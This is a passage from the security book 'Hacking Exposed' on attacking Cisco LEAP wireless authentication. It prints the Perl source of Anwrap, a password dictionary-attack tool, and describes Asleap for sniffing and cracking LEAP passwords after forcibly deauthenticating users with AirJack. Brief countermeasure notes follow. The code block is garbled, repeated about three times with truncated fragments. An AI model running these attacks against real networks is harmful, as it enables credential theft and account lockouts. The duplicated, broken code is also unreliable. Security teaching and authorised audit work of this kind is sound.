LEAP ATTACKS | Hacking Exposed 5th Edition

The LEAP wireless technology was first created and brought to market by Cisco Systems in December 2000. Cisco's LEAP is an 802.1X authentication schema for wireless networks (WLANs), and by default LEAP supports strong two-way authentication and encryption. LEAP is different from most other authentication systems because it utilizes a remote RADIUS server for the actual authentication. Additionally, it utilizes a strong logon password as the encryption's "shared secret key" as well as provides dynamic peruser, per-session encryption keys.

Although a number of vendors support LEAP and have integrated it into their product suites, it is mainly found in Cisco wireless devices. Currently, LEAP is the main protocol within the Cisco Wireless Security Suite of protocols. LEAP is available at no additional cost and utilizes the standard 802.1X framework for transmission and packet decoding.

Anwrap

Popularity:	8
Simplicity:	9
Impact:	9
*Risk Rating:*	9

Anwrap is an extremely easy-to-use and highly dangerous wireless security tool. It is a wrapper for the ancontrol utility, which serves as a dictionary attack tool to target weak LEAP-enabled Cisco wireless devices. The tool parses through a user array or list and then utilizes it to authenticate to a target system. All results are logged to a separate text file. The Anwrap Perl script source can be downloaded from http://www. securiteam .com/tools/6O00P2060I.html or potentially retrieved by contacting Brian Barto (brian@bartosoft.com) or Ron Sweeney (sween@modelm.org). The following is the actual Anwrap tool source code written in Perl. Inline documentation has been provided.

 #!/usr/bin/perl # # Version 0.1 # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary # attack tool against LEAP enabled Cisco Wireless Networks. Traverses # a user list and password list attempting authentication and logging the # results to a file. Really wrecks havoc on RADIUS calls to NT Networks that # have lockout policies in place, you have been warned. Tweak the Timeouts, # a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon. # This tool was designed to audit authentication strengths before deploying LEAP in # a production environment. # # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away. # Tested on FreeBSD 4.7. # # General Usage :  #!/usr/bin/perl # # Version 0.1 # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary # attack tool against LEAP enabled Cisco Wireless Networks. Traverses # a user list and password list attempting authentication and logging the # results to a file. Really wrecks havoc on RADIUS calls to NT Networks that # have lockout policies in place, you have been warned . Tweak the Timeouts, # a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon. # This tool was designed to audit authentication strengths before deploying LEAP in # a production environment. # # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away. # Tested on FreeBSD 4.7. # # General Usage : $0 <userfile> <passwordfile> <logfile> # # Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org > # November 2K02 use Expect (); if ($#ARGV<0) { &usage; } #setup some stuff $userfile =$ARGV[0]; $passfile=$ARGV[1]; $logfile = $ARGV[2]; $date ='date'; open(GAR, $passfile) or die "can't open password file, $passfile"; @GAR= <GAR>; open(USER, "<$userfile) or die; @users = \<USER\>; close(USER); open(FILE, ">\>$logfile"); print FILE "\n\nScript started at $date \n\n"; close(FILE); foreach $user (@users) { chop($user); $auth_success = "no"; $end_of_passwords = "no"; $i = 0; while ($auth_success eq "no" && $end_of_passwords eq "no") { $pass = $GAR[$i]; chop($pass); local $/; $p = Expect->spawn('ancontrol -L '.$user); $p->expect(5, "assw")  die "Never received LEAP password"; print $p "$pass\r"; print $pass,"\n"; if ($p->expect(10, "uth")) { print "Success!\n"; open(FILE, ">\>$logfile") or die; print FILE "User: $user Password: $pass SUCCESS! ", "\n"; close(FILE); $auth_success = "yes"; } else { print "Failed\n"; open (FILE, ">\>$logfile") or die; print FILE "User: $user Password: $pass FAILED! ", "\n"; close(FILE); } $p->close(); if ($i == $#GAR) { $end_of_passwords = "yes"; } else { $i++; } } } sub usage { print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n"; print "Ron Sweeney <sween\@modelm.org>\n"; print "Brian Barto <brian\@bartosoft.com>\n\n\n\n"; exit; } 
 <userfile> <passwordfile> <logfile> # # Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org > # November 2K02 use Expect (); if ($#ARGV<0) { &usage; } #setup some stuff $userfile =$ARGV[0]; $passfile=$ARGV[1]; $logfile = $ARGV[2]; $date ='date'; open(GAR, $passfile) or die "can't open password file, $passfile"; @GAR= <GAR>; open(USER, "<$userfile) or die; @users = \<USER\>; close(USER); open(FILE, ">\>$logfile"); print FILE "\n\nScript started at $date \n\n"; close(FILE); foreach $user (@users) {   chop($user);   $auth_success = "no";   $end_of_passwords = "no";   $i = 0;   while ($auth_success eq "no" && $end_of_passwords eq "no")   {     $pass = $GAR[$i];     chop($pass);     local $/;     $p = Expect->spawn('ancontrol -L '.$user);     $p->expect(5, "assw")  die "Never received LEAP password";     print $p "$pass\r";     print $pass,"\n";     if ($p->expect(10, "uth"))     {       print "Success!\n";       open(FILE, ">\>$logfile") or die;       print FILE "User: $user Password: $pass SUCCESS! ", "\n";       close(FILE);       $auth_success = "yes";     }     else          {       print "Failed\n";       open(FILE, ">\>$logfile") or die;       print FILE "User: $user Password: $pass FAILED! ", "\n";       close(FILE);     }     $p->close();     if ($i == $#GAR) { $end_of_passwords = "yes"; }     else { $i++; }   } } sub usage { print "\nUsage :  #!/usr/bin/perl # # Version 0.1 # anwrap.pl is a wrapper for ancontrol that serves as a Dictionary # attack tool against LEAP enabled Cisco Wireless Networks. Traverses # a user list and password list attempting authentication and logging the # results to a file. Really wrecks havoc on RADIUS calls to NT Networks that # have lockout policies in place, you have been warned . Tweak the Timeouts, # a lengthy LEAP timeout on the Cisco side could make for a very boring afternoon. # This tool was designed to audit authentication strengths before deploying LEAP in # a production environment. # # Needs ancontrol and some Perl stuff, hit up CPAN until the errors go away. # Tested on FreeBSD 4.7. # # General Usage : $0 <userfile> <passwordfile> <logfile> # # Brian Barto < brian@bartosoft.com > and Ron Sweeney < sween@modelm.org > # November 2K02 use Expect (); if ($#ARGV<0) { &usage; } #setup some stuff $userfile =$ARGV[0]; $passfile=$ARGV[1]; $logfile = $ARGV[2]; $date ='date'; open(GAR, $passfile) or die "can't open password file, $passfile"; @GAR= <GAR>; open(USER, "<$userfile) or die; @users = \<USER\>; close(USER); open(FILE, ">\>$logfile"); print FILE "\n\nScript started at $date \n\n"; close(FILE); foreach $user (@users) { chop($user); $auth_success = "no"; $end_of_passwords = "no"; $i = 0; while ($auth_success eq "no" && $end_of_passwords eq "no") { $pass = $GAR[$i]; chop($pass); local $/; $p = Expect->spawn('ancontrol -L '.$user); $p->expect(5, "assw")  die "Never received LEAP password"; print $p "$pass\r"; print $pass,"\n"; if ($p->expect(10, "uth")) { print "Success!\n"; open(FILE, ">\>$logfile") or die; print FILE "User: $user Password: $pass SUCCESS! ", "\n"; close(FILE); $auth_success = "yes"; } else { print "Failed\n"; open (FILE, ">\>$logfile") or die; print FILE "User: $user Password: $pass FAILED! ", "\n"; close(FILE); } $p->close(); if ($i == $#GAR) { $end_of_passwords = "yes"; } else { $i++; } } } sub usage { print "\nUsage : $0 <userfile> <passwordfile> <logfile>\n\n"; print "Ron Sweeney <sween\@modelm.org>\n"; print "Brian Barto <brian\@bartosoft.com>\n\n\n\n"; exit; } 
 <userfile> <passwordfile> <logfile>\n\n"; print "Ron Sweeney <sween\@modelm.org>\n"; print "Brian Barto <brian\@bartosoft.com>\n\n\n\n"; exit; }

Anwrap Countermeasures

Anwrap targets weak authentication mechanisms in Cisco LEAP-enabled wireless devices. The best protection for these poorly secured devices is to enforce strong authentication, such as the use of secret keys or passwords, and to continuously audit those services.

Asleap

Popularity:	7
Simplicity:	6
Impact:	5
*Risk Rating:*	6

Asleap is a wireless security tool designed to grab and decrypt weak LEAP passwords from Cisco wireless access points and corresponding wireless cards. Asleap can also read live traffic from any supported wireless network card via RFMON mode, or in the case you want to monitor multiple frequency channels, it supports channel hopping . In the case a wireless card or access point is identified, the obtained information is displayed to the user in near real time. Stored PCAP files or AiroPeek NX files can be utilized as input in the case post real-time data is to be analyzed or processed .

The unique feature for Asleap is that it can integrate with Air-Jack to knock authenticated wireless users off targeted wireless networks. The benefit of this feature is that you can deauthenticate every user on a network to force them to reauthenticate to the access point. Then, when the user reauthenticates to a Cisco LEAP-enabled device, their password will be sniffed and cracked with Asleap. This tool is a must-have for all wireless penetration testers!

Installing Asleap is an extremely easy process. You start by first running the make command. After compiling or "making" the binaries and genkeys, you are ready to run the tool. To execute and automatically deauthenticate (knock off) wireless network users, you must first download and install the drivers and binaries for the Air-Jack tool. AirJack can be downloaded from http://802.11ninja.net. Asleap can be downloaded from http://asleap. sourceforge .net.

Asleap Countermeasures

Asleap countermeasures are the same as the ones for the previously discussed Anwrap LEAP-attacking tool.